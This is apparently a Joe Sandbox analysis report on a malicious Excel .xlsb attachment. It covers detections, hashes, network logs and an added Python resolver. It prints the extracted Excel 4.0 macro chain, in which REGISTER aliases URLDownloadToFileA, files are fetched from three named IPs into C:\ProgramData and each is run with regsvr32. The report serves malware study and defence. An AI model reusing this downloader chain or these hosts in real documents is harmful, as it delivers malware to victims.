Windows Analysis Report ClaimCopy-46148734-12012021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Jbx Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | (35 entries; the run resolved no domains, see Contacted Domains) |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | (18 entries) |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found protected and hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | Code function: | 0_2_02E966E8 | |
Source: | Code function: | 0_2_02E966F3 | |
Source: | Code function: | 0_2_02E96340 | |
Source: | Code function: | 0_2_02E96743 | |
Source: | Code function: | 0_2_02E96753 | |
Source: | Code function: | 0_2_02E9CF01 |
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | (13 entries) | Jump to behavior |
Source: | Binary or memory string: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | (16 entries) | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Code function: | 0_2_02E966E8 |
Source: | Code function: | 0_2_02E966E8 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Numbers in parentheses are the signature hit counts the original matrix renders as superscripts; cells without a count are the unmatched techniques the matrix always displays.
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting (2) | Path Interception | Process Injection (2) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution (22) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (4) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (2) | NTDS | File and Directory Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (12) | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting (2) | LSA Secrets | System Information Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | ReversingLabs | Document-Excel.Downloader.EncDoc |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
7 URLs | 0% | Avira URL Cloud | safe |
3 URLs | 0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
2 URLs | false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
15 URLs | | false | | high (7), unknown (6), low (2) |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
94.140.114.63 | unknown | Latvia | 43513 | NANO-ASLV | false | |
146.19.170.39 | unknown | France | 7726 | FITC-ASUS | false | |
185.106.123.73 | unknown | Netherlands | 60117 | HSAE | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532405 |
Start date: | 02.12.2021 |
Start time: | 08:21:11 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ClaimCopy-46148734-12012021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 14 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
08:25:14 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Samples | Detection |
---|---|---|
94.140.114.63 | 4 | malicious |
146.19.170.39 | 4 | malicious |
185.106.123.73 | 4 | malicious |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Samples | Detection |
---|---|---|
HSAE | 20 | malicious |
NANO-ASLV | 20 | malicious |
FITC-ASUS | 20 | malicious |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
Encrypted: | false |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98319 |
Entropy (8bit): | 7.829516708837839 |
Encrypted: | false |
SSDEEP: | 1536:sB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUdvgJT:bc6EehCfCZpUHKGXbBKsiix |
MD5: | 109A55D7849B3834E28D9B6C6DEC942E |
SHA1: | 48A7BFC52B4DD1FD830D4FA450EB499084A954DD |
SHA-256: | 135ADD4D95F6069C03E719C8B7190794FCF9A72A7D7147217E233346556C04A1 |
SHA-512: | 261393EEBBA20E96B130FF171925493F29F9286EF5D43EDE6C6189EF4C47F57C4D14DCD9A6B2E0672DD645FB7B4A6DAC2F55267E9945AAFC7782090B8FF148A3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98319 |
Entropy (8bit): | 7.829516708837839 |
Encrypted: | false |
SSDEEP: | 1536:sB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUdvgJT:bc6EehCfCZpUHKGXbBKsiix |
MD5: | 109A55D7849B3834E28D9B6C6DEC942E |
SHA1: | 48A7BFC52B4DD1FD830D4FA450EB499084A954DD |
SHA-256: | 135ADD4D95F6069C03E719C8B7190794FCF9A72A7D7147217E233346556C04A1 |
SHA-512: | 261393EEBBA20E96B130FF171925493F29F9286EF5D43EDE6C6189EF4C47F57C4D14DCD9A6B2E0672DD645FB7B4A6DAC2F55267E9945AAFC7782090B8FF148A3 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.829986417947683 |
TrID: |
|
File name: | ClaimCopy-46148734-12012021.xlsb |
File size: | 98558 |
MD5: | f1107ae8c76f3ac6c7691fa5a857b206 |
SHA1: | b69597b25562a96547402d9bcadc096a340b8a69 |
SHA256: | 85278a1649ffd17dae84fce72827f804b0091b907efd841ac95f6b4644fd8d5a |
SHA512: | c861360e6f69811f7e4be22885e58e0c233ee409f83ee560e796e4038024d49c5675bde2c2cab45df5dcd94ee83324fac47b5aefd0835327e1a8af17e41f26ef |
SSDEEP: | 1536:whNB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU3Tds:O0c6EehCfCZpUHKGXbBKsiiCds |
File Content Preview: | PK..........!..]j.....R.......[Content_Types].xml ...(.....................................................................................................................................FF.................................................................. |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-46148734-12012021.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
Cells are listed as row,col,formula as emitted by the macro extractor. Both indices are 0-based (20,4 is E21; 16,3 is D17): that is the only indexing under which the Tiposa!E21..E26, G22..G24 and D17..D20 references land on the data cells of the second listing.

Download and execute chain (on a sheet other than Tiposa, since it reads Tiposa! cells; presumably the Tiposa1 sheet targeted by the GOTO below):
8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx")
23,6,=HALT()

Data cells and the REGISTER call (sheet Tiposa):
16,3,uRl
17,3,="Mon"
18,3,="URLDownloadTo"
19,3,="JJCCBB"
20,4,185.106.123.73/
21,4,146.19.170.39/
21,6,=RANDBETWEEN(142536473,988879789754)
22,4,94.140.114.63/
22,6,=".dat"
23,4,94.140.114.63/
23,6,=".dat2"
24,4,185.106.123.73/
24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9)
25,4,146.19.170.39/
37,6,=GOTO(Tiposa1!G8)

Resolved reading of the cells above: REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9) evaluates to REGISTER("uRlMon","URLDownloadToFileA","JJCCBB","Drozd",,1,9), so urlmon!URLDownloadToFileA is exposed to the sheet under the alias Drozd (type string JJCCBB: long return value, then long, string, string, double, double arguments, which matches the five-argument Drozd calls). Each Drozd row fetches http://<host>/<RANDBETWEEN(142536473,988879789754)>.dat (rows 8 to 10) or .dat2 (rows 11 to 13) into C:\ProgramData\Volet1.ocx through Volet6.ocx; the hosts in row order are 185.106.123.73, 146.19.170.39, 94.140.114.63, 94.140.114.63, 185.106.123.73 and 146.19.170.39, which is also the order the TCP connections appear in under Network Behavior. The EXEC rows then hand each file to regsvr32; in rows 18 to 20 the &Tiposa!G22& sits inside the quoted string as listed, so regsvr32 receives that text literally rather than the random number. In this run none of the downloads succeeded (unanswered connection attempts to 185.106.123.73 and 94.140.114.63, HTTP 403 from 146.19.170.39), yet all six regsvr32 processes were still launched (see System Behavior), so no second-stage payload was analysed.
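The script below resolves the cell references in the two listings into the concrete download URLs, local paths and regsvr32 command lines. It is an added example written for this page, not code from Joe Sandbox or from the sample. Assumptions: the listing indices are 0-based row,col (so 20,4 is E21 and 16,3 is D17); the download chain sits on sheet Tiposa1 and the data cells on Tiposa, so the listing is re-typed with a leading sheet column that the report does not have; RANDBETWEEN is kept as a placeholder rather than evaluated, since its value is random at run time.

```python
"""Resolve the cell references in the Excel 4.0 (XLM) macro listing above.

Added example for this page, not code from Joe Sandbox or from the sample.
Assumptions: listing indices are 0-based row,col (20,4 is E21; 16,3 is D17);
the download chain is on sheet Tiposa1 and the data cells on Tiposa (the
sheet column below is added here); RANDBETWEEN is kept as a placeholder.
"""
import re

LISTING = r"""
Tiposa1,8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
Tiposa1,9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
Tiposa1,10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
Tiposa1,11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
Tiposa1,12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
Tiposa1,13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
Tiposa1,15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx")
Tiposa1,16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
Tiposa1,17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
Tiposa1,18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx")
Tiposa1,19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx")
Tiposa1,20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx")
Tiposa1,23,6,=HALT()
Tiposa,16,3,uRl
Tiposa,17,3,="Mon"
Tiposa,18,3,="URLDownloadTo"
Tiposa,19,3,="JJCCBB"
Tiposa,20,4,185.106.123.73/
Tiposa,21,4,146.19.170.39/
Tiposa,21,6,=RANDBETWEEN(142536473,988879789754)
Tiposa,22,4,94.140.114.63/
Tiposa,22,6,=".dat"
Tiposa,23,4,94.140.114.63/
Tiposa,23,6,=".dat2"
Tiposa,24,4,185.106.123.73/
Tiposa,24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9)
Tiposa,25,4,146.19.170.39/
Tiposa,37,6,=GOTO(Tiposa1!G8)
"""
REF_RE = re.compile(r"^(?:(?P<sheet>\w+)!)?(?P<cell>[A-Z]{1,3}[1-9][0-9]*)$")
CALL_RE = re.compile(r"^(?P<name>[A-Za-z_][\w.]*)\((?P<args>.*)\)$", re.S)


def parse_listing(text):
    """'sheet,row,col,value' lines -> {(sheet, 'E21'): value}; columns A..Z only."""
    cells = {}
    for line in text.strip().splitlines():
        sheet, row, col, value = line.split(",", 3)  # the value may contain commas
        cells[(sheet, f"{chr(65 + int(col))}{int(row) + 1}")] = value
    return cells


def split_top_level(text, sep):
    """Split on sep outside double quotes and parentheses."""
    parts, cur, depth, quoted = [], "", 0, False
    for ch in text:
        quoted ^= ch == '"'
        if not quoted:
            depth += (ch == "(") - (ch == ")")
        if ch == sep and not quoted and depth == 0:
            parts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    return parts + [cur.strip()]


def expr(cells, text, sheet):
    """Evaluate a '&'-concatenation of literals, cell references and calls to text."""
    out = []
    for tok in split_top_level(text, "&"):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            out.append(tok[1:-1])  # string literal
        elif (m := REF_RE.match(tok)):
            ref = (m.group("sheet") or sheet, m.group("cell"))
            raw = cells.get(ref, f"<{ref[0]}!{ref[1]}>")  # unknown cell: keep the reference visible
            out.append(expr(cells, raw[1:], ref[0]) if raw.startswith("=") else raw)
        elif CALL_RE.match(tok):
            out.append(f"<{tok}>")  # nested call such as RANDBETWEEN: placeholder only
        else:
            out.append(tok)  # numeric literal
    return "".join(out)


def call(raw):
    """'=NAME(a,b)' -> ('NAME', ['a', 'b']) with the arguments still unresolved."""
    m = CALL_RE.match(raw[1:]) if raw.startswith("=") else None
    return (m.group("name"), split_top_level(m.group("args"), ",")) if m else None


def summarize(cells):
    """Resolve REGISTER aliases first, then report what the other formula cells do."""
    calls = [(sheet, *c) for (sheet, _), raw in cells.items() if (c := call(raw))]
    aliases = {}  # alias -> (dll, export, REGISTER type string)
    for sheet, name, raw_args in calls:
        if name == "REGISTER":
            dll, export, types, alias = (expr(cells, a, sheet) for a in raw_args[:4])
            aliases[alias] = (dll, export, types)
    downloads, commands = [], []
    for sheet, name, raw_args in calls:
        args = [expr(cells, a, sheet) for a in raw_args]
        if aliases.get(name, ("", "", ""))[1].lower() == "urldownloadtofilea":
            downloads.append((args[1], args[2]))  # (pCaller, szURL, szFileName, dwReserved, lpfnCB)
        elif name == "EXEC":
            commands.append(args[0])
    return {"aliases": aliases, "downloads": downloads, "exec": commands}
```

Running `summarize(parse_listing(LISTING))` yields the alias table (Drozd is uRlMon!URLDownloadToFileA with type string JJCCBB), six URL/path pairs of the form http://&lt;ip&gt;/&lt;RANDBETWEEN(...)&gt;.dat or .dat2, and the six regsvr32 command lines. The resolver only understands the concatenation subset this dropper uses; it is a triage aid for listings like this one, not an XLM emulator, and cells the extractor omitted (such as G8) surface as bracketed references instead of values.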
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-08:22:02.281420 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:02.281462 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:08.529732 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:21.359317 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:26.313483 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:30.295440 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:22:41.648286 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
12/02/21-08:24:09.205154 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:15.511167 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:29.247078 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:32.918862 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:35.960823 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 185.106.123.67 | 192.168.2.22 | ||
12/02/21-08:24:48.200067 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 08:21:59.245469093 CET | 49165 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:02.250252962 CET | 49165 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:08.256751060 CET | 49165 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:20.272634029 CET | 49166 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:23.281136990 CET | 49166 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:29.287617922 CET | 49166 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:22:41.348845005 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.408149958 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:22:41.408358097 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.409698963 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.468642950 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:22:41.648286104 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:22:41.648520947 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:22:41.678699970 CET | 49168 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:22:44.686182976 CET | 49168 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:22:50.692778111 CET | 49168 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:02.708092928 CET | 49169 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:05.716710091 CET | 49169 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:11.723367929 CET | 49169 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:23.750586987 CET | 49170 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:26.763032913 CET | 49170 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:32.769552946 CET | 49170 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:44.784657001 CET | 49171 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:46.652292967 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:23:46.652539968 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:23:47.793701887 CET | 49171 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:23:50.789545059 CET | 49167 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:23:50.848592997 CET | 80 | 49167 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:23:53.800252914 CET | 49171 | 80 | 192.168.2.22 | 94.140.114.63 |
Dec 2, 2021 08:24:05.851381063 CET | 49173 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:08.855582952 CET | 49173 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:14.862256050 CET | 49173 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:26.877198935 CET | 49174 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:29.886161089 CET | 49174 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:35.892690897 CET | 49174 | 80 | 192.168.2.22 | 185.106.123.73 |
Dec 2, 2021 08:24:47.901475906 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:24:47.960593939 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:24:47.960725069 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:24:47.961788893 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:24:48.020816088 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:24:48.200067043 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:24:48.200364113 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
Dec 2, 2021 08:25:53.208133936 CET | 80 | 49175 | 146.19.170.39 | 192.168.2.22 |
Dec 2, 2021 08:25:53.208262920 CET | 49175 | 80 | 192.168.2.22 | 146.19.170.39 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 146.19.170.39 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 08:22:41.409698963 CET | 1 | OUT | |
Dec 2, 2021 08:22:41.648286104 CET | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49175 | 146.19.170.39 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 08:24:47.961788893 CET | 4 | OUT | |
Dec 2, 2021 08:24:48.200067043 CET | 5 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
